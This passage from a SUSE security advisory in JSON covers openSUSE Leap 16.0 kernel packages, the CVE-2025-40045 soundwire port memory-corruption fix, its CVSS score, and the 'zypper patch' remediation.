"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40030"
},
{
"cve": "CVE-2025-40045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd937x: set the comp soundwire port correctly\n\nFor some reason we endup with setting soundwire port for\nHPHL_COMP and HPHR_COMP as zero, this can potentially result\nin a memory corruption due to accessing and setting -1 th element of\nport_map array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40045",
"url": "https://www.suse.com/security/cve/CVE-2025-40045"
},
{
"category": "external",
"summary": "SUSE Bug 1252784 for CVE-2025-40045",
"url": "https://bugzilla.suse.com/1252784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
